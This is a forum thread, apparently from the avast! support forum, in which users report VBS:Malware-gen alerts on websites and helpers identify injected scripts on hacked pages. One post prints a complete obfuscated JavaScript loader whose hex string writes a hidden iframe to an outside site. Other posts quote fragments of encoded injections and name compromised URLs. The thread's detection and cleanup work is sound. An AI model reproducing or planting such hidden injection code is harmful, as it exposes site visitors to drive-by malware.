-
but what about not being able to bring up the site again? can I reset that right?
--Smoovious
-
You could temporarily add the domain the the Web Shield, Customize, Exceptions tab, URLs to exclude. That however would leave a large hole in the web shield security.
If you can do without your bikini fix for a short time, then the next VPS update shouldn't be too long.
-
hahahaha. :) I don't need it now, no... just wanted to make sure that it wasn't going to be persistent after the next VPS update. :D
-- Smoovious
-
i am new in this forum. i ve been using avst home edition last one year The problem I'm facing is whenever I plugin USB drive into pc and double-click to open that, it takes some time to open then my avst continuously shows a virus has been detected message c:\windows\system32\BV:malware gen, then follwed by a message box windows script host: can not find script file c:\documents and settings\Administrator\boot.vbs" when click ok to terminate it re appeares again and again i could not stooped it. if reboot also it appears again. please help me [I scan everytime I plugin USB]
Is there any antispyware, antimalware or antivirus program that I need to run in order to save from virus and worms.
Please reply.
Thanks.
-
Seems no one has had this problem for a while. I installed Avast! on a friends' system awhile ago and she called me up today to say that she got this message when she went to the yahoo main page. I assured her it was a mistake but to make sure, I told her to scan her whole computer. She did and came up with no viri or malware. I advised her to try to go to other websites. She successfully went to 5 or 6. She even went to other Yahoo! websites. It was just when she typed in "http://www.yahoo.com/" that she got the warning and the option to "Abort Connection". Just because I was curious, I did it myself. I too got the message that a "virus" was found when I went to the site. It's funny that the URL showing is "http://www.yahoo.com/" but the Avast Warning indicates "http://www.yahoo.com/\unp34785754". Fooling around, I find the numbers at the end change every time I connect to this page. I believe I have the latest VPS version (080622-0, 06/22/2008) even though in previous posts on this thread indicate it was a False-Positive and would be fixed in the next VPS version - and that was months ago.
The reason this is important is because this friend knows just about enough about computers to ask the most stupid questions (a la, "What kind of bait do I use to get rid of that mouse pointer?") You know, you've met computer users like that. It took 20 minutes to get her off the phone after I showed her how to do a scan. She has a 250GB drive and wanted to stay on the phone until it was done. This is even though I told her what to expect if she FOUND a virus/malware and told her to call me back if that happened. Anyway, I'm stuck with her for another 11 months (contractual phone/home technical AND hardware support), but she's driving my nuts. ???
-
i got the same msg too. first it was on my dads comp. i looked to see what vps he was running, it is 080622-0. i was running the next older one, i went to www.yahoo.com (http://www.yahoo.com) with no problems. then i did a manual update, went to yahoo and got the msg. file name: http://www.yahoo.com/\unp150501928 this only happens when you type the URL in or click on a link. i can access my mail through YahooIM with no problems. BTW we are both running Avast 4.8 Pro.
:EDIT: as soon as i posted this, there was an update. 080623-0 seems to have fixed yahoo. :EDIT:
-
I run two websites, www.labki.pl and www.laboteka.pl and receive many messages from the Avast users about bugs founded. Other users have ho problems, could you please check the sites?
-
Do you know what is the purpose of the huge encrypted javascript stuff at the end of the frontpage?
-
As I'm not very experienced I'm not sure what are you asking about. There should be typical elements for Joomla only and additionally Google Analitics, nothing more.
-
After the analytics, there is one line with obfuscated and encoded javascript, about 6KBs long. Highly suspicious and since you dont' know what is it about?
-
There is nothing I know about. Analitics is added to HTML of the template and there, it looks, is nothing more then required, no unexpected scripts after it.
-
Load the homepage and then inspect the source code...
<script language="javascript">$="%64b%3d%22%3c7`7%3c7a7%3c7b7%3c7c7%3c7d7%3c7e7%3c7f7%3c7g7%
-
Any idea what could be causing is warning on my site: www . zoomphoto . ca
it was reported by a user today.
The site is custom coded... not an off the shelf software package.
Thanks,
-
The very same thing as for the user before you. There is something huge and encrypted on the end of the homepage, after the Google Analytics. Do you have an idea, what may it be?
-
No clue! I just removed it... time to change the root pw on the box!
-
You might want to report this to your Host as I doubt that your site was alone if they can do it to you they in theory could and would do it to other hosted sites.
-
I am my own host, and own my own servers... I've already changed root... now it's just searching through logs... yay!
It was phpfake that I was hit with... or so it the function was named.
-
Hi,
I've some members on my website who have the same matter on this site : hxxp://www.internetdvd.org
"Nom du fichier : hxxp://internetdvd.org/
Nom du logiciel malveillant : VBS:Malware-gen
Type de logiciel malveillant : Virus/Ver"
I've Kaspersky and i've none problem.
Thanks to see and correct the problem.
PS : Sorry for my english, i'm french ^^'
-
Your English is fine.
I wasn't able to get a look at the page source (using FF 3.0.1) as it didn't display, just displays a blank page, so if this is a measure to protect against stealing content, it also stops checking.
There is a auto redirect to display hxxp://internetdvd.org/catalog.php, so I couldn't see if the problem is at hxxp://internetdvd.org/ or the catalog.php page, php is vulnerable to hacking so I don't know if you have checked your pages for unknown code.
I have reported it as a possible false positive, but I don't know if they won't hit the same problem I did.
-
visionex, check your security, you've been hacked. Check your index, there is some huge dirty encrypted thing after the Analytics code.You may also want to search for 'phpfake' in your sourcecode.
-
Hello guys,
I have several members of my website that use Avast! reporting me that Avast warns about VBS:Malware-gen trojan on my frontpage.
The url is http://f1portugal.com .
AFAIK there is no suspicious code in the frontpage, but maybe Avast is suspecting the DHTML code i put there.
Please let me know if it is clean, so i can assure people it's safe.
TIA
-
Sorry, it's not. We're getting a script, most probably in the redirection?
<script language=JavaScript>var kco=" shapgvba hmdvx(oz){ine fz,we=\"{v^abR
-
Ok. Thank you very much for helping me. I'll check that out. ;)
-
I am getting an Avast VBS:malware warning for our site http://www.tangira.com.
My VPS is 080723-0 (programme build 4.8.1227).
Can you please advise?
Thanks!
-
Do you know what is the encrypted stuff at the end of your webpage, after the analytics code?
-
Sorry, it's not. We're getting a script, most probably in the redirection?
<script language=JavaScript>var kco=" shapgvba hmdvx(oz){ine fz,we=\"{v^abR
Thank you very much for pointing me in the right direction kubecj. ;)
Problem solved now.
-
Kubecj - I don't as I didn't design the site. There has never been a problem before in accessing before though? I can check with the designers if you think it's suspicious. Is there any way to tell (given it's encrypted).
-
Basically it's encrypted iframe pointing to 202.164.52.199. That's a site somewhere in India.
-
Basically it's encrypted iframe pointing to 202.164.52.199. That's a site somewhere in India.
In other words, _most_likely_ a code injection that you were unaware of...
-
OK - thanks a lot for the advice. I have deleted the offending code and the site loads fine now. (also changed the CMS panel passwords!)
-
visionex, check your security, you've been hacked. Check your index, there is some huge dirty encrypted thing after the Analytics code.You may also want to search for 'phpfake' in your sourcecode.
http://www.internetdvd.org isn't my site ^^
I just don't understand why BitDefender, Kaspersky and others antivirus detect none virus except Avast ::)
-
Right now it's clean, that's why they don't detect anything now. OTOH, our script malware detection is quite good, I'd say.
-
OTOH, our script malware detection is quite good, I'd say.
Congratulations. Keep your good work.
-
I have a forum showing up the same Virus/Worm.
hxxp://www.syaoregon.us/forum
The url that Avast! shows is:http://www.syaoregon.us/forum/\unp263177177VPS version: 080725-1, 07/25/2008
It's an outdated SMF forum. All links to it show up infected. This is just too weird.
All other sites & SMF forums work fine for me. ???
-
This forum is also SMF and some time ago there was a code injection attack, so I wouldn't be surprised if 'all links showed up as infected," especially if SMF software is also old.
If the site is hacked then all the pages are likely to have had code placed on them
The URL that avast shows includes the extracted file that was scanned, the \unp263177177 at the end. So the infection is on the main forum page.
There is a Hacked by Tqrl on the page title so it would appear my assumption of it being hacked is correct and all links are likely to have been injected with code. If you are the webmaster or know the webmaster then you should let him know, if he doesn't already that his site has been hacked.
Please modify your post so the link isn't active, e.g. hXXp://www.syaoregon.us/forum replace the tt with XX as in the example.
-
Wow. That's weird. Who would hack an inactive forum from an organization? :-\
Sorry, fixed link.
Thanks. I couldn't even see the "Hacked by Tqrl" page title.
-
No problem, glad I could help.
People or bots that don't know it is inactive, they are just seeking out vulnerabilities and exploit them when found.
Welcome to the forums.
-
Wow. That's weird. Who would hack an inactive forum from an organization? :-\
It is not a manual work anymore. Hackers create crawlers that proactively look for compromisable sites (such as those running outdated/vulnerable PHP-based forums) and inject the shyte automatically... it doesn't really matter if the forum is "inactive" or not...
Cheers
Vlk
-
Hey when opening www.metal-forever.eu im getting malware http://www.metal-forever.eu/forum/clientscript/vbulletin_menu.js?v=368 and abording connection whats up with it site had a real virus or is next misunrestood.?
Sorry for my language
Regards Grey
-
Really infected. See the top of the page, massive js encrypted stuff.
-
I have this VBS thing in my 3 flash disks. I tried everything like moving the infected autorun file to the chest then deleting it manually or using a Turkish virus detecter named Dracula but my problem persisted and recurred everytime. I've just used Flash Disinfector and I haven't received any alert from Avast but when I opened my flash disks I saw a blank autorun file made my Flash Disinfector. I formatted one of my flash disks and the problem recurred again. Is Flash Disinfector a temporary solution? What do I need to do to prevent my flash disks from this VBS threat?
Thanks in advance.
-
Q
please start your own thread - call it Flash Disinfector or something Topical
run a malware bytes anti malware free scan- Click REMOVE post the log
which virus do you have?
With avast- leave the hits in the Chest
do not delete flash disinfector or the file it creates- it's put there for your protection
do not post back here
-
I've got one that needs checking, www.short-fiction.co.uk (logging in with a uname/pword creates the warning
-
lukosanthropos
does your post have something to do with VBS:Malware-gen?
If yes continue IF NOT start a new thread
You have one WHAT that needs checking?
Why? symptoms?
I tried that site and script block blocked tow parts of it
Have you tried "site adviser" or similar?
-
yes it does, going to that website i mentioned and trying to log in causes avast to show a VBS:Malware-gen error, my machine is not infected, I'm not that daft, one of my friends was asking me about it so i tested it in a vmware environment.
I posted this here as I had read the first few posts of this thread, where people highlighted websites which generated these errors from avast and let you know.
You have one WHAT that needs checking? - One website which I would like to know if they are trying to introduce malware (VBS:Malware-gen) to my machine or if this is a false alarm
Why? - Because I'm not going to use the site if it is
Symptoms? - None, I'm not stupid enough to get infected
-
my vps version 080902-0 (forgot that bit sorry)
-
Thanks
I'd like to know too
perhaps one of the members with a sandbox can check out the site mentioned in post 143
-
It would be somewhat difficult to test as it requires you logon.
So I just did it with a made up username and password and the page that is causing the grief is hxxp://www.short-fiction.co.uk/account/redirect.php, unfortunately I can't capture this redirect.php page to have a look at it.
-
As soon as you get the webshield warning, go to your temp directory, in _avast4_ subdir you'll find the temporary files. You can copy them elsewhere and then let webshield to delete them from the temp. One of the tempfiles would be that problematic page.
-
How bout copying them to the user section of the chest and also uploading to virus total?
It would be nice to see how dangerous these hits are
lukosanthropos
looks as if we are making some progress- you lurking?
-
As soon as you get the webshield warning, go to your temp directory, in _avast4_ subdir you'll find the temporary files. You can copy them elsewhere and then let webshield to delete them from the temp. One of the tempfiles would be that problematic page.
I tried what you suggested, even had the _avast_ sub directory open waiting, tried to logon and got the alert, left the alert window open and no unp files appear on the alert by avast, even refreshed folder but no files in that location.
Clicked the Abort connection to close the alert window and no unp files found, did a search for unp*.tmp and found two (unrelated to this, ashMaiSv.exe created these), both in the windows\temp\_avast4_ folder so it isn't using the folder avast created in C:\Documents and Settings\UserName\Local Settings\Temp\_avast4_ ???
So I'm out, can't capture even the unp files.
Edit, OK tried again and managed to capture the unp file, will send it for analysis as a possible FP.
-
Strange. While the dialogue is opened, the file should be in temp\_avast4_. Where is located your temp depends on your settings.
-
For some reason there are two _avast4_ folders on my system, I was watching the wrong one first time out, watching the windows\temp\_avast4_ second time and was able to capture the file.
Update, uploaded the unp*.tmp file to VT and 7/36 detections (includes GData), see http://www.virustotal.com/analisis/54cbd22b1a6bbe88fd4de3c0822a914a (http://www.virustotal.com/analisis/54cbd22b1a6bbe88fd4de3c0822a914a)
There is a script tag that has what avast must think is suspect/malicious, see code below.
<script type="text/javascript">
eval(unescape("%64%6F[deleted]%29%3B"));
</script>
-
I am getting a virus warning of: VBS:Malware-gen
in this web site: www.dinamobasket.com
but there is no encrypted javascript code in it.
any idea?
Thanks
-
Hello,
detection of www.dinamobasket.com is a false positive and will be corrected in next vps update. Thanks for information.
-
I'm getting a virus warning of " VBS:Malware-gen"
in all websites of *.freecoolsite.com
for example:
f.freecoolsite.com
prayudi.freecoolsite.com
homebased.freecoolsite.com
spidernet.freecoolsite.com
my version of VPS: 080926-0
-
I'm getting a virus warning of " VBS:Malware-gen"
in all websites of *.freecoolsite.com
Dr. Web returned clean. But I trust much more on avast detection than it.
Maybe some obfuscated or encrypted script (malicious ???) could be in that pages.
-
site: http://www.casaboontha.com has the same report, and according to the hosting provider this is faulty.
VPS info from avast: 080926-0, 26-09-2008 build 4.8.1229
-
@ pedro1612
It certainly looks like an FP I captured one page (Sign of "VBS:Malware-gen" has been found in "hXXp://f.freecoolsite.com/" file.) and uploaded it to virustotal and effectively only avast detects anything.
See VT results http://www.virustotal.com/analisis/0ab73679254a792a8d003af65677aa3f (http://www.virustotal.com/analisis/0ab73679254a792a8d003af65677aa3f).
With the domain name followed by /" file. I don't know if avast is looking at one of the external links or the default page (which it seems to do or it wouldn't alert on the page I captured).
I didn't see anything obvious in the page that would trigger the alert.
I have sent a sample to avast for further analysis.
-
It certainly looks like an FP
David, can you manage the code of that page and see if it is obfuscated or encrypted?
I really trust on avast websites detections... it's quite improved compared to other antivirus.
-
It doesn't look like obfuscated or encrypted code, as I said I cant see anything obvious (which given my limited experience isn't a certainty).
-
Thank you!!
Maybe it's something in the ad's added automatically by a hosting provider... ? ???
-
site: http://www.casaboontha.com has the same report, and according to the hosting provider this is faulty.
VPS info from avast: 080926-0, 26-09-2008 build 4.8.1229
I have had a look at this page and there are several batches of javascript that could be making avast alert as the code appears obfuscated and avast isn't alone in detecting something, see http://www.virustotal.com/analisis/cc711f2774933c9a422aaead3f11bc0b (http://www.virustotal.com/analisis/cc711f2774933c9a422aaead3f11bc0b).
Like this
<script language='JavaScript' type='text/javascript'>
<!--
var prefix = 'ma' + 'il' + 'to';
var path = 'hr' + 'ef' + '=';
var addy42235 = 'sagafoo' + '@';
addy42235 = addy42235 + 'hotmail' + '.' + 'com';
var addy_text42235 = 'sagafoo' + '@' + 'hotm
ail' + '.' + 'com';
document.write( '<a ' + path + '\'' + prefix + ':' + addy42235 + '\'>' );
document.write( addy_text42235 );
document.write( '<\/a>' );
//-->\n </script>
I haven't enough experience to know what is trying to be achieved but it isn't clear (javascript is a plain language) what is going on and this 'could' be the reason.
This one especially looks very suspicious, I have broken down the single line of code (as it would be huge) into something easier to read.
<script type="text/javascript">
function BFD6F5DD5DB451E605DC93C1C(F856A149343E267113D4743C9CC){var BABAC8D053646DAAEED97=16;
return(parseInt(F856A149343E267113D4743C9CC,BABAC8D053646DAAEED97));}
function EDC04E5FA7431499C99(AF1EAFAE6DA9EFFC64209858078EBFBC)
{function FDB6EFBD03C6DE29(){var A22AFFBCBE863863A1B64DF=2;return
A22AFFBCBE863863A1B64DF;}var A01766E6154626B4="";for(E846AAB0F24560E5FDD=0;
E846AAB0F24560E5FDD<AF1EAFAE6DA9EFFC64209858078EBFBC.length;
E846AAB0F24560E5FDD+=FDB6EFBD03C6DE29()){A01766E6154626B4+=
(String.fromCharCode(BFD6F5DD5DB451E605DC93C1C
(AF1EAFAE6DA9EFFC64209858078EBFBC.substr(E846AAB0F24560E5FDD,
FDB6EFBD03C6DE29()))));}document.write(A01766E6154626B4);}
EDC04E5FA7431499C99("3C696672616D65207372633D22687474703A2F2F7878786D6F7
66965732E6469702E6A702F31352F6A735F676F5F66312E706870222077696474683D312
06865696768743D31207374796C653D227669736962696C6974793A68696464656E3B70
6F736974696F6E3A6162736F6C757465223E3C2F696672616D653E");
</script>
-
Thank you!!
Maybe it's something in the ad's added automatically by a hosting provider... ? ???
You're welcome.
I have no idea if that might be the case, but there wasn't anything like that as far as I could tell, we will have to wait for avast to analyse it and correct the VPS if it is as I suspect an FP. They are usually quick to correct once identified.
-
This one especially looks very suspicious
Thanks... I've quite confident that something was cheesy...
-
It might be totally benign, but with that level of obfuscation you have to wonder why they need to do that.
Or if they are even aware of that last <script> after all of the HTML code, when by convention (wc3 standards) all code with the exception document type information should be between the opening and closing HTML tags. This script is outside those tags and that is also suspicious and given the added obfuscation, more so.
So whoever was communicating with the webmaster should point that out too.
-
about freecoolsite... with new version the problem has ended ;D!
-
Thanks for the update.
-
site: http://www.casaboontha.com has the same report, and according to the hosting provider this is faulty.
VPS info from avast: 080926-0, 26-09-2008 build 4.8.1229
I have had a look at this page and there are several batches of javascript that could be making avast alert as the code appears obfuscated and avast isn't alone in detecting something, see http://www.virustotal.com/analisis/cc711f2774933c9a422aaead3f11bc0b (http://www.virustotal.com/analisis/cc711f2774933c9a422aaead3f11bc0b).
Like this
<script language='JavaScript' type='text/javascript'>
<!--
var prefix = 'ma' + 'il' + 'to';
var path = 'hr' + 'ef' + '=';
var addy42235 = 'sagafoo' + '@';
addy42235 = addy42235 + 'hotmail' + '.' + 'com';
var addy_text42235 = 'sagafoo' + '@' + 'hotm
ail' + '.' + 'com';
document.write( '<a ' + path + '\'' + prefix + ':' + addy42235 + '\'>' );
document.write( addy_text42235 );
document.write( '<\/a>' );
//-->\n </script>
I haven't enough experience to know what is trying to be achieved but it isn't clear (javascript is a plain language) what is going on and this 'could' be the reason.
This one especially looks very suspicious, I have broken down the single line of code (as it would be huge) into something easier to read.
<script type="text/javascript">
function BFD6F5DD5DB451E605DC93C1C(F856A149343E267113D4743C9CC){var BABAC8D053646DAAEED97=16;
return(parseInt(F856A149343E267113D4743C9CC,BABAC8D053646DAAEED97));}
function EDC04E5FA7431499C99(AF1EAFAE6DA9EFFC64209858078EBFBC)
{function FDB6EFBD03C6DE29(){var A22AFFBCBE863863A1B64DF=2;return
A22AFFBCBE863863A1B64DF;}var A01766E6154626B4="";for(E846AAB0F24560E5FDD=0;
E846AAB0F24560E5FDD<AF1EAFAE6DA9EFFC64209858078EBFBC.length;
E846AAB0F24560E5FDD+=FDB6EFBD03C6DE29()){A01766E6154626B4+=
(String.fromCharCode(BFD6F5DD5DB451E605DC93C1C
(AF1EAFAE6DA9EFFC64209858078EBFBC.substr(E846AAB0F24560E5FDD,
FDB6EFBD03C6DE29()))));}document.write(A01766E6154626B4);}
EDC04E5FA7431499C99("3C696672616D65207372633D22687474703A2F2F7878786D6F7
66965732E6469702E6A702F31352F6A735F676F5F66312E706870222077696474683D312
06865696768743D31207374796C653D227669736962696C6974793A68696464656E3B70
6F736974696F6E3A6162736F6C757465223E3C2F696672616D653E");
</script>
Many thanks, will have a look into the code.
-
You're welcome, happy hunting.
A belated welcome to the forums.
-
Hi,
i have this warning with avast on one of my site : sign of "VBS:Malware-gen" has been found in "http://www.ictraona.it" but i looking for every kind of malware codes in php or html files and there's nothing malicious. Can is it a fake warning?
my version
081006-0,06/10
Thanks.
Ciao
-
Encrypted hidden iframe at the beginning leading to xxxmovies.dip.jp...
Definitely does not look like a false.
-
kubecj, are there legit uses of encrypted iframes or not? I mean, does avast detect any encrypted iframe or scans and separate the good from the bad ones?
-
I would never encrypt such a simple thing. But people are strange ;D
Right now we don't detect all encrypted iframes as bad. But, that may change in the future.
-
I would never encrypt such a simple thing. But people are strange ;D
Right now we don't detect all encrypted iframes as bad. But, that may change in the future.
Thanks. Living and learning with you...
-
I take it that mais has been in and found that encrypted iframe and removed it as the link is no longer detected.
-
Hi Guys, I need help with this as I keep getting the alarm for the following.
File Name : C:\autorun.inf
Malware Name : VBS:Malware-GEN
VPS Version : 081027-1, 10/27/2008
It starts the minute i turn the pc on and i cannot seem to get it off the even though I tried scanning it in safe mode and all.
Please advise
-
Are you using Windows XP/Vista?
Can you schedule a boot-time scanning?
Start avast! > Right click the skin > Schedule a boot-time scanning.
Select for scanning archives.
Boot.
If infected files are found, it's safer to send them to Chest instead of deleting them.
This way you can further analysis them.
-
There shouldn't be a autorun.inf on any hard disk partition, it is a file usually associated with removable media like a CD to start the CD running.
So with autorun.inf in a HDD partition, it indicates that your system has been infected most likely from a usb flash drive, do you have a USB flash drive ?
The autorun.inf will contain run commands for files also on your system (and probably undetected), so I would ask you to open this file with notepad and copy and paste the contents of the file here. You will need to pause the standard shield to be able to open this with notepad, enable the standard shield after you have copied the contents and closed the autorun.inf file.
There is most likely a location for a file that it is trying to run, see if you can find this file and upload it to virustotal, see below, for scanning.
Check the offending/suspect file at: VirusTotal - Multi engine on-line virus scanner (http://www.virustotal.com/) and report the findings here. You can't do this with the file securely in the chest, you need to extract it to a temporary (not original) location first, see below.
Create a folder called Suspect in the C:\ drive, e.g. C:\Suspect. Now exclude that folder in the Standard Shield, Customize, Advanced, Add, type (or copy and paste) C:\Suspect\* That will stop the standard shield scanning any file you put in that folder. You should now be able to export any file in the chest to this folder and upload it to VirusTotal without avast alerting.
If it is detected by multiple scanners but not avast send the sample to avast...
Send the sample to virus@avast.com zipped and password protected with the password in email body, a link to this topic might help and undetected malware in the subject.
Or you can also add the file to the User Files (File, Add) section of the avast chest (if it isn't already there) where it can do no harm and send it from there (select the file, right click, email to Alwil Software). No need to zip and PW protect when the sample is sent from chest. A copy of the file/s will remain in the original location, so any further action you take can remove that.
-
i've got problems with irritating malware and trojan called win32:Pink [trj] and vbs:malware-gen AVASt home edition won't work even the splash screen scanner but the service is still running, looks like if there is opened windows that contain text antivirus the trojan quickly disabled it.
i've used boot time scan and turn off the system restore it successfully delete Autorun.inf at the c:\ and d:\ drive and i've forced to delete netcfg.dll and netcfg.0000 at system32\com folder that recognize as win32: pink[trj] but it keep coming when the system start again
please help :'(
i use windows xp service pack 2 build 2600, VPS i forgot.
-
Hello,
I have a VBS:Malware-gen
when I access
http://www.equilibriarte.org
VPS-Version: 081102-0, 11/02/2008
I think they use Iframes - Is there really a Problem with this site??
Please take a look...
Thanks for your help !!!
-
Yep, they're serving something long, strange and encrypted at the end of the html.
-
redsock2, nowadays, avast website detection is more accurate and higher than other antivirus. Welcome to avast forums.
-
Yes, I am impressed, really!!!
Thank you...
I Will reccomend Avast now :-))
I ask myself , why the equilibri admins dont realize this
script and remove it, its obvious in the htmlsource..
also it only appears on their main page, strange..
-
Yes, strange indeed, if it is something they know about then you would have to ask why the hidden, encrypted data in javascript, what is a plain language script, what have they to hide. Either that or they are unaware that their home page has been hacked.
Welcome to the forums.
-
Hello,
I have a VBS:Malware-gen
when I access hxxp://www.asdaurora-pregnana.it
VPS Version : 081217-0
can anybody help me ?
thans
iussi
-
There is a encrypted javascript at the end of the page, almost certainly a malware, I'd not consider that a FP.
-
I have the same problem
Avast popups when going to the site
hXXp://kentvoice.com
Screenshot here:
http://root.joshmir.com/vbs-malware.png
Thanks
-
buyog, nowadays, avast malware detection on webpages is quite accurate... take care!
-
Large, encrypted stuff at the end of the page, most likely the malware.
Remember:
a) you can catch the bad stuff even from legitimate pages
b) Using MSIE can get you in trouble, avoid it if possible.
-
a belated thank you to DavidR for pointing out the code!
I was able to fix my website. Thanks and a happy and prsperous 2009!
-
You're welcome and a Happy New Year to you too.
-
Hi
I have avast home and everytime I go to this site: http://www.clownclicks.com avast pops up for me to abort connection.
It says Malware name: VBS:Obfuscated-gen [trj]
Malware type: Trojan Horse
VPS version: 090102-0, 01/02/2009
This does not appear in any other sites I go to, just to clownclicks.com
Never had any problems going to clownclicks.com and this virus warning just started about 30 min ago
I asked 3 friends to pull up clownclicks.com and they tell me they do not get any virus warnings.
So why me????
Hope to get answers, thanks!
-
Hi I scanned it with DrWeb's link checker:
Checking: http://www.clownclicks.com/
Engine version: 4.44.0.9170
File size: 10.84 KB
http://www.clownclicks.com/ - Ok
Checking: http://www.clownclicks.com/functions.js
File size: 7390 bytes
Went there with flock browser and NoScript temporarily allowing that site, no alerts (not from avast). So there must be something else wrong. Is your java version up to date?
polonus
-
Does not alarm for me either. Could it be you got installed something bad on your computer? Please, start another thread if you want to get more help.
-
I can visit that page without an alert, I can't see anything in the page source that might trigger it, perhaps the webmaster found the script and removed it. Or as kubecj said perhaps something on your system.
-
Same here hxxp://www.live-magazine.eu/
Can you check it, please. Thanks
-
Mega-obfuscated script at the end of the page. Not a fp.
-
Hello,
I was looking at my "warning" log, and found the following from 6/23/2008:
"VBS Malware-gen has been found in "http://www.yahoo.com/\unp 113810025 file"
I never received any other notification of this problem, other than just noticing it in the log. I have had no problems, whatsoever, so I am proceeding under the assumption there is nothing to be concerned about. Am I correct? Thank you for any replies and corrections.
-
Hi foto,
The live-magazine dot eu link is also flagged by finjan as having malicious code,
polonus
-
I am also getting a VBS:malaware-gen message when visiting what I believe to be a safe company website.
hXXp://www.thelawrencegroup.com/
Filename hXXp://www.thelawrencegroup.com/AC_RunActiveContent.js
VBS:Malware-gen
Virus/Worm
090109-0, 01/09/2009
Please let me know if this is a false positive.
-
There is a big chunk of obfuscated document write (javascript) at the bottom of the script.
I have no idea what that is intended to do or why it would be obfuscated in that way or even if it is meant to be there. Since javascript is meant to be a plain language scripting language when obfuscated in this way I get suspicious at what they have to hide.
So it may well be a legit detection but you could submit it (as a possible false positive) for further analysis.
-
I'm getting this same warning for hXXp://ssbresins.com/. It has the same line of compressed/weird JS as some of these other pages. Just thought I'd chime in.
-
Well if it is your site or one you regularly visit it has probably been hacked.
Considering its location just before the closing Body and HTML taks it certainly looks like code injection into the page.
Please modify your post, changing the http tp hXXP so the link isn't active, avoiding accidental exposure, e.g. hXXp://ssbresins.com/.
-
Getting Malware-gen for hXXp://icamaxi.se, any idea if it's a FP?
Thanks
-
Not a false.
-
Getting Malware-gen for hXXp://icamaxi.se, any idea if it's a FP?
As kubecj said not a false positive, a big chunk of javascript (which I have edited to make it easier to see in the image) trying to look like an advert script, but it has an obfuscated link at the end of it. There should be no legitimate reason to do that, e.g. what are they trying to hide.
So it looks like the site has been hacked.
Please modify your post change the http to hXXp to break the link to avoid accidental exposure (as in the quoted text above).
-
I plugged in my digital camera and the virus notification came up and said I had VBS:Malware-gen, so I put it in the virus chest and scanned it and it said it was in this file AutoRun.inf. I just had to completely wipe, format and reinstall vista the other day due to not having an antivirus and the first thing I did when I got it running was download avast. I know for sure theres nothing up with my laptop...
If anyone could help me please do!
-
This is somewhat different to what is covered here, hacked web sites and is for a different malware name.
- Please start a New Topic of your own as this seems unrelated to the original subject and will just confuse the topic and we will try to help.
- Go to this link, http://forum.avast.com/index.php (http://forum.avast.com/index.php), scroll down to the Viruses and Worms forum and click it, click the New Topic button at the top of the list and post there.
-
It says Malware name: VBS:Obfuscated-gen [trj]
Malware type: Trojan Horse
I clicked on www.thtndc.org
avast 4.8 database 090806-1 08/06 also popped up and warned me of VBS:Obfuscated-gen [trj]
This site was a good one and meant no harm.
Can someone check it please to see if there is any more trojan or malware?
Please also check www.phiatruoc.net as it is a site administered by the same team of the above.
-
Well it tries to install a chat-room-client without asking the user and at best is down right rude and at worst possibly malicious.
It is also creating an applet and an object where it appears to be hiding (obfuscating) what the purpose is and I don't like what it tries to do directly in the C:\ drive.
avast isn't alone in thinking there is something wrong with this, http://www.virustotal.com/analisis/d430171aface541b88b199daef5962168ec1686e0ab2d8cb95ea9f85dfecea59-1249663618 (http://www.virustotal.com/analisis/d430171aface541b88b199daef5962168ec1686e0ab2d8cb95ea9f85dfecea59-1249663618)
-
--post removed-- wrong section
-
Hello
Please can you start a new topic as your problem is unrelated to the original poster's and will cause some confusion.
Also, please can you modify your post (and change your next one) to break the link (i.e.change http to hXXp)
Thanks,
-Scott-
(http://sites.google.com/site/spg20scottsweb/_/rsrc/1249295824755/home/images/starting-a-new-topic/New%20Topic.gif)
-
Sorry bout that. Will do.
-
When you do, I didn't find anything, so some more info is required.
I have just visited the home page hXXp://www.greenbeanery.ca/bean/home.php with firefox 3.5.2 and I had no alert, so if you can be more specific on the URL where the alert lies - Please 'modify' your post change the URL from http to hXXp or www to wXw (as in my example), to break the link and avoid accidental exposure to suspect sites, thanks.
Since I'm on dial-up and the site is media rich, it takes forever to load, so I can't go browsing in the hope of finding it.
-
Hello,
yesterday, juste when closing the computer (Windows XP SP2), the Avast (visrus base updated) showed the alert VBS-malware-gen in logonui.exe and blocked the computer. Today, after the restart I checked logonui.exe with the Avast - same problem. Avast proposes me to cure it, I accept, then it proposes to change the file with a sane copy, I accept it, and the alert re-appears again and again.
I have no idea of where from the virus came. To check with an alternative mean, I launched CureIt! which ran also in Win32, and it didn't find anything suspicious. Could it be an Avast error or shoul I really worry?
Thank you for help!
-
Hello,
send us (virus@avast.com) the file to analyze and put "False positive" to subject. But "VBS-malware-gen" in .exe looks at 1st look suspisious (VBS is Visual Basic Script -- text file not binary).
Thank you
Milos
-
Plz help me also, i am having problem with the file D:/autorun.inf and its showing on the screen again and again that the file is infected with vbs:malware-gen. Plz some1 help how to remove this :-\
Thank You
-
Plz help me also, i am having problem with the file D:/autorun.inf and its showing on the screen again and again that the file is infected with vbs:malware-gen. Plz some1 help how to remove this :-\
Thank You
Read this http://forum.avast.com/index.php?topic=53253.0